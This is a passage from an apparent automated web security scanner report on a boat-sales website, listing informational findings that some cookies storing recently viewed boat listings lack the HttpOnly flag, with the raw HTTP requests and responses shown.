Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 19:58:56 GMT
Server: Apache
Cache-Control: private
If-Modified-Since: Tue, 25 Jan 2011 01:47:39 GMT
Content-Language: en-US
Set-Cookie: VIEWED_BOATS_STORE=1787065%5B%25%5D32%27+Regulator+32+FS%5B%25%5DUSD%26nbsp%3B97%2C500%5B%25%5DHilton+Head%2C+SC%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F1%2F7%2F8%2F7%2F0%2F1787065_20_mini.jpg%3F1282081450000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-FS-1787065%2FHilton-Head%2FSC%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; path=/; expires=Fri, 27-Jan-2012 19:58:56 GMT
Set-Cookie: VIEWED_BOATS_STORE=1787065%5B%25%5D32%27+Regulator+32+FS%5B%25%5DUSD%26nbsp%3B97%2C500%5B%25%5DHilton+Head%2C+SC%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F1%2F7%2F8%2F7%2F0%2F1787065_20_mini.jpg%3F1282081450000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-FS-1787065%2FHilton-Head%2FSC%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; domain=www.boats.com; path=/; expires=Thu, 01-Dec-1994 16:00:00 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

<t
...[SNIP]...

9.55. http://www.yachtworld.com/boats/2005/Regulator-32-Fs-2270278/Placida/FL/United-States previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/boats/2005/Regulator-32-Fs-2270278/Placida/FL/United-States

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

VIEWED_BOATS_STORE=2270278%5B%25%5D32%27+Regulator+32+FS%5B%25%5DUSD%26nbsp%3B110%2C500%5B%25%5DPlacida%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F7%2F0%2F2%2F2270278_1_mini.jpg%3F1286049970000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-FS-2270278%2FPlacida%2FFL%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; path=/; expires=Fri, 27-Jan-2012 19:58:56 GMT
VIEWED_BOATS_STORE=2270278%5B%25%5D32%27+Regulator+32+FS%5B%25%5DUSD%26nbsp%3B110%2C500%5B%25%5DPlacida%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F7%2F0%2F2%2F2270278_1_mini.jpg%3F1286049970000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-FS-2270278%2FPlacida%2FFL%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; domain=www.boats.com; path=/; expires=Thu, 01-Dec-1994 16:00:00 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /boats/2005/Regulator-32-Fs-2270278/Placida/FL/United-States HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 19:58:56 GMT
Server: Apache
Cache-Control: private
If-Modified-Since: Sat, 22 Jan 2011 03:59:44 GMT
Content-Language: en-US
Set-Cookie: VIEWED_BOATS_STORE=2270278%5B%25%5D32%27+Regulator+32+FS%5B%25%5DUSD%26nbsp%3B110%2C500%5B%25%5DPlacida%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F7%2F0%2F2%2F2270278_1_mini.jpg%3F1286049970000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-FS-2270278%2FPlacida%2FFL%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; path=/; expires=Fri, 27-Jan-2012 19:58:56 GMT
Set-Cookie: VIEWED_BOATS_STORE=2270278%5B%25%5D32%27+Regulator+32+FS%5B%25%5DUSD%26nbsp%3B110%2C500%5B%25%5DPlacida%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F7%2F0%2F2%2F2270278_1_mini.jpg%3F1286049970000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-FS-2270278%2FPlacida%2FFL%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; domain=www.boats.com; path=/; expires=Thu, 01-Dec-1994 16:00:00 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

<t
...[SNIP]...

9.56. http://www.yachtworld.com/boats/2005/Regulator-32-Fs-Center-Console-1990703/Brick/NJ/United-States previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/boats/2005/Regulator-32-Fs-Center-Console-1990703/Brick/NJ/United-States

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

VIEWED_BOATS_STORE=1990703%5B%25%5D32%27+Regulator+32+FS+Center+Console%5B%25%5DUSD%26nbsp%3B129%2C000%5B%25%5DBrick%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F1%2F9%2F9%2F0%2F7%2F1990703_1_mini.jpg%3F1184600846000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-FS-Center-Console-1990703%2FBrick%2FNJ%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; path=/; expires=Fri, 27-Jan-2012 19:58:57 GMT
VIEWED_BOATS_STORE=1990703%5B%25%5D32%27+Regulator+32+FS+Center+Console%5B%25%5DUSD%26nbsp%3B129%2C000%5B%25%5DBrick%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F1%2F9%2F9%2F0%2F7%2F1990703_1_mini.jpg%3F1184600846000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-FS-Center-Console-1990703%2FBrick%2FNJ%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUn